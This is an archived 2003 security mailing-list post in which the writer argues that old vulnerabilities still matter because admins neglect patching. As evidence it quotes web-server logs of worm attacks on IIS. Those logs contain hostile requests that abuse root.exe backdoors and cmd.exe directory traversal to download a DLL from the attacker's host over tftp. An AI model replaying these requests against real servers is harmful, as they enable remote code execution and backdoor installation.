|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Aj Effin Reznor (aj_at_reznor.com)
Date: Sat Jan 25 2003 - 17:01:27 CST
"Mark Litchfield was known to say....."
> Not to miss the wagon:
>
> Based on the fact that it affects SQL servers, and interestingly enough 6
> months to the day, that remain unpatched, and would have been protected,
> before everyone goes and starts to blame MS, I've scraped the barrel to
> produce the following,
The "wagon" in this case seems to be driven and ridden by a ton of admins
that don't patch, don't pay attention, and don't keep up on things.
Face it, the "ease of use" of MS OS's leads to "ease of neglect" also.
Servers used to be optimized. Admins studied their usage levels of drivespace,
memory usage, avg. CPU consumption over 24 hour periods, baselined these
averages and at set intervals rechecked them for comparisons.
Now, we have an easy to use GUI where you go to "Properties" and find the
little slider marked "Performance", or perhaps a dropdown box, to tweak
your server to run better. And somehow you suspect that these point and
click admins are going to be 100% on top of patching their servers?
Your rational is that a 6 month old exploit doesn't need the re-investigation,
esp. once a worm affecting it comes out.
Here, take a look-see at this:
63.150.78.XXX - - [22/Jan/2003:05:35:11 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 360 "-" "-"
63.150.78.XXX - - [22/Jan/2003:05:35:32 -0800] "GET /scripts/root.exe?/c+tftp%20-i%2063.150.78.XXX%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 414 "-" "-"
63.150.78.XXX - - [22/Jan/2003:05:35:54 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 9807 "-" "-"
63.150.78.XXX - - [22/Jan/2003:05:35:54 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 358 "-" "-"
<snip 56 entries in between>
63.150.78.XXX - - [22/Jan/2003:05:52:04 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.150.78.XXX%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 441 "-" "-"
63.150.78.XXX - - [22/Jan/2003:05:52:23 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.150.78.XXX%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 441 "-" "-"
63.150.78.XXX - - [22/Jan/2003:05:52:42 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.150.78.XXX%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 441 "-" "-"
63.150.78.XXX - - [22/Jan/2003:05:53:01 -0800] "GET /scripts/..%252f../httpodbc.dll HTTP/1.0" 200 367 "-" "-"
Mein Gott! What's this? Attack signatures from a worm that's HOW old? I
mean, my eyes, Apache, both must be deceiving me, right? That's old news, all
admins MUST be patched against this!
The hole that Code Red leveraged was Old News (TM) also, but had eEye not
disassembled it, had no one, would whitehouse.gov have stood a chance?
Sometimes, revisiting a hole and examing the proof-of-concept code that's in
the wild and affecting major portions of the net *does* need to be looked at.
Or, is ignorante truely bliss?
-aj.
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]